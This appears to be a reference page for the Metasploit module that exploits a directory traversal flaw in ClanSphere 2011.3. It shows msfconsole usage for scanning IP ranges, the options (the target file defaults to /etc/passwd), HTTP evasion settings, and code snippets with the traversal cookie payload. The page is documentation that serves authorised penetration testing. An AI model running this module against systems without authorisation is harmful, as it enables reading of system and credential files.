ClanSphere 2011.3 Local File Inclusion Vulnerability - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/clansphere_traversal metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: ClanSphere 2011.3 Local File Inclusion Vulnerability
Module: auxiliary/scanner/http/clansphere_traversal
Source code: modules/auxiliary/scanner/http/clansphere_traversal.rb
Disclosure date: 2012-10-23
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module exploits a directory traversal flaw found in Clansphere 2011.3. The application fails to handle the cs_lang parameter properly, which can be used to read any file outside the virtual directory.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/clansphere_traversal
msf auxiliary(clansphere_traversal) > show options
    ... show and set options ...
msf auxiliary(clansphere_traversal) > set RHOSTS ip-range
msf auxiliary(clansphere_traversal) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(clansphere_traversal) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(clansphere_traversal) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(clansphere_traversal) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/clansphere_traversal auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/clansphere_traversal

msf6 auxiliary(scanner/http/clansphere_traversal) > show info

       Name: ClanSphere 2011.3 Local File Inclusion Vulnerability
     Module: auxiliary/scanner/http/clansphere_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2012-10-23

Provided by:
  blkhtc0rp
  sinn3r <[email protected]>

Check supported:
  No

Basic options:
  Name       Current Setting      Required  Description
  ----       ---------------      --------  -----------
  DEPTH      10                   yes       The max traversal depth to root directory
  FILE       /etc/passwd          yes       The file to obtain
  Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80                   yes       The target port (TCP)
  SSL        false                no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /clansphere_2011.3/  yes       The URI path to the web application
  THREADS    1                    yes       The number of concurrent threads (max one per host)
  VHOST                           no        HTTP server virtual host

Description:
  This module exploits a directory traversal flaw found in Clansphere 
  2011.3. The application fails to handle the cs_lang parameter 
  properly, which can be used to read any file outside the virtual 
  directory.

References:
  OSVDB (86720)
  https://www.exploit-db.com/exploits/22181

Module Options


This is a complete list of options available in the scanner/http/clansphere_traversal auxiliary module:

msf6 auxiliary(scanner/http/clansphere_traversal) > show options

Module options (auxiliary/scanner/http/clansphere_traversal):

   Name       Current Setting      Required  Description
   ----       ---------------      --------  -----------
   DEPTH      10                   yes       The max traversal depth to root directory
   FILE       /etc/passwd          yes       The file to obtain
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                   yes       The target port (TCP)
   SSL        false                no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /clansphere_2011.3/  yes       The URI path to the web application
   THREADS    1                    yes       The number of concurrent threads (max one per host)
   VHOST                           no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/clansphere_traversal auxiliary module:

msf6 auxiliary(scanner/http/clansphere_traversal) > show advanced

Module advanced options (auxiliary/scanner/http/clansphere_traversal):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/clansphere_traversal module can do:

msf6 auxiliary(scanner/http/clansphere_traversal) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/clansphere_traversal auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/clansphere_traversal) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unable to read '<FILE>', possibily because


Here is a relevant code snippet related to the "Unable to read '<FILE>', possibily because" error message:

55:	      'uri'    => normalize_uri(base, "index.php"),
56:	      'cookie' => "blah=blah; cs_lang=#{traverse}#{f}%00.png"
57:	    })
58:	
59:	    if res and res.body =~ /^Fatal error\:/
60:	      print_error("Unable to read '#{datastore['FILE']}', possibily because:")
61:	      print_error("\t1. File does not exist.")
62:	      print_error("\t2. No permission.")
63:	      print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.")
64:	
65:	    elsif res and res.code == 200

1. File does not exist.


Here is a relevant code snippet related to the "1. File does not exist." error message:

56:	      'cookie' => "blah=blah; cs_lang=#{traverse}#{f}%00.png"
57:	    })
58:	
59:	    if res and res.body =~ /^Fatal error\:/
60:	      print_error("Unable to read '#{datastore['FILE']}', possibily because:")
61:	      print_error("\t1. File does not exist.")
62:	      print_error("\t2. No permission.")
63:	      print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.")
64:	
65:	    elsif res and res.code == 200
66:	      pattern_end = "     UTC +1 - Load:"

2. No permission.


Here is a relevant code snippet related to the "2. No permission." error message:

57:	    })
58:	
59:	    if res and res.body =~ /^Fatal error\:/
60:	      print_error("Unable to read '#{datastore['FILE']}', possibily because:")
61:	      print_error("\t1. File does not exist.")
62:	      print_error("\t2. No permission.")
63:	      print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.")
64:	
65:	    elsif res and res.code == 200
66:	      pattern_end = "     UTC +1 - Load:"
67:	      data = res.body.scan(/\<div id\=\"bottom\"\>\n(.+)\n\x20{5}UTC/).flatten[0].lstrip

3. <IP> isn't vulnerable to null byte poisoning.


Here is a relevant code snippet related to the "3. <IP> isn't vulnerable to null byte poisoning." error message:

58:	
59:	    if res and res.body =~ /^Fatal error\:/
60:	      print_error("Unable to read '#{datastore['FILE']}', possibily because:")
61:	      print_error("\t1. File does not exist.")
62:	      print_error("\t2. No permission.")
63:	      print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.")
64:	
65:	    elsif res and res.code == 200
66:	      pattern_end = "     UTC +1 - Load:"
67:	      data = res.body.scan(/\<div id\=\"bottom\"\>\n(.+)\n\x20{5}UTC/).flatten[0].lstrip
68:	      fname = datastore['FILE']

Fail to obtain file for some unknown reason


Here is a relevant code snippet related to the "Fail to obtain file for some unknown reason" error message:

74:	        fname
75:	      )
76:	
77:	      vprint_line(data)
78:	      print_good("#{fname} stored as '#{p}'")
79:	
80:	    else
81:	      print_error("Fail to obtain file for some unknown reason")
82:	    end
83:	  end
84:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • blkhtc0rp
  • sinn3r

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.